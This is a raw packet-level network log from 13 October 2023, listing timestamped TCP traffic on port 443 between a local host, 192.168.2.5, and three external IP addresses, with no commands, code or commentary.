Oct 13, 2023 15:21:13.126179934 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.126187086 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.126225948 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.129477978 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.129498959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.129554987 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.129561901 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.129591942 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.129611969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.132862091 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.132879019 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.132942915 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.132950068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.132986069 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.135724068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.135740042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.135797977 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.135804892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.135838985 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.138670921 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.138684988 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.138750076 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.138756990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.138794899 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.141383886 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.141397953 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.141452074 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.141458988 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.141493082 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.144953012 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.144969940 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.145015955 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.145021915 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.145046949 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.145068884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.147856951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.147874117 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.147924900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.147932053 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.147970915 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.150907993 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.150934935 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.150974035 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.150979996 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.151032925 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.151032925 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.154009104 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.154022932 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.154072046 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.154078007 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.154140949 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.154186964 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.157011986 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.157025099 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.157109022 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.157114029 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.157269001 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.160196066 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.160218954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.160299063 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.160306931 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.160346031 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.162884951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.162909031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.162950039 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.162955046 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.162992954 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.162992954 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.165842056 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.165857077 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.165915966 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.165921926 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.165950060 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.165951014 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.169696093 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.169711113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.169766903 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.169773102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.169806957 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.169826031 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.171950102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.171963930 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.172012091 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.172017097 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.172060013 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.175056934 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.175071001 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.175103903 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.175110102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.175137043 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.175154924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.178400040 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.178414106 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.178450108 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.178455114 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.178488970 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.178515911 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.181372881 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.181386948 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.181422949 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.181428909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.181461096 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.181474924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.184132099 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.184149027 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.184186935 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.184192896 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.184218884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.184231043 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.187721014 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.187733889 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.187803984 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.187809944 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.187846899 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.190340042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.190352917 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.190419912 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.190427065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.190464973 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.192692995 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.192708015 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.192764044 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.192770958 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.192816019 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.195357084 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.195373058 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.195432901 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.195440054 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.195475101 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.198342085 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.198357105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.198426008 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.198438883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.198478937 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.200942039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.200963020 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.201006889 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.201013088 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.201041937 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.201057911 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.202845097 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.202949047 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.203485966 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.203500032 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.203553915 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.203561068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.203600883 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.205858946 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.205873013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.205951929 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.205965996 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.206006050 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.208875895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.208889961 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.208942890 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.208949089 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.208983898 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.211349010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.211363077 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.211429119 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.211435080 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.211472988 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.213758945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.213772058 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.213828087 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.213834047 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.213871002 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.216980934 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.216995001 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.217046022 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.217062950 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.217097998 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.219271898 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.219302893 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.219341993 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.219346046 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.219372034 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.219387054 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.221729994 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.221744061 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.221798897 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.221806049 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.221843004 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.224335909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.224349976 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.224416018 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.224423885 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.224459887 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.227283955 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.227297068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.227374077 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.227380991 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.227420092 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.229887962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.229901075 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.229958057 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.229964972 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.230001926 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.232248068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.232259989 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.232323885 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.232330084 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.232364893 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.234623909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.234642029 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.234697104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.234704018 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.234741926 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.237761021 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.237773895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.237828016 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.237834930 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.237869024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.240336895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.240350008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.240417004 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.240423918 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.240458965 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.242801905 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.242822886 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.242891073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.242897987 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.242938995 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.243848085 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.245743036 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.245758057 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.245824099 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.245843887 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.245881081 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.248212099 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.248225927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.248280048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.248286963 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.248320103 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.250838995 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.250850916 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.250904083 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.250910044 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.250945091 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.253245115 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.253257990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.253305912 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.253313065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.253355026 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.256145000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.256158113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.256223917 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.256231070 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.256267071 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.258735895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.258749008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.258835077 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.258841038 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.258877039 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.258939028 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.261137962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.261151075 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.261226892 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.261233091 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.261265993 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.261326075 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.261404991 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.261928082 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.262733936 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.263334990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.263350010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.263416052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.263422012 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.263467073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.265238047 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.265252113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.265316963 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.265324116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.265362978 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.265768051 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.266899109 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.268146038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.268152952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.268172979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.268228054 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.268249989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.268275023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.268285990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.269862890 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.269882917 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.269938946 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.269948959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.269993067 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.270441055 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.270453930 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.270502090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.270509958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.270546913 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.272722006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.272736073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.272789955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.272797108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.272880077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.274807930 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.274830103 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.274863958 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.274869919 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.274952888 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.275130033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.275151014 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.275213003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.275221109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.275254965 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.278192997 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.278206110 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.278264046 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.278270960 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.278311968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.279975891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.279989958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.280057907 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.280065060 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.280101061 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.281824112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.281837940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.281904936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.281910896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.281950951 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.284272909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.284291029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.284363031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.284369946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.284413099 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.286479950 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.286494017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.286556959 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.286565065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.286602020 CEST	49736	443	192.168.2.5	45.130.41.106
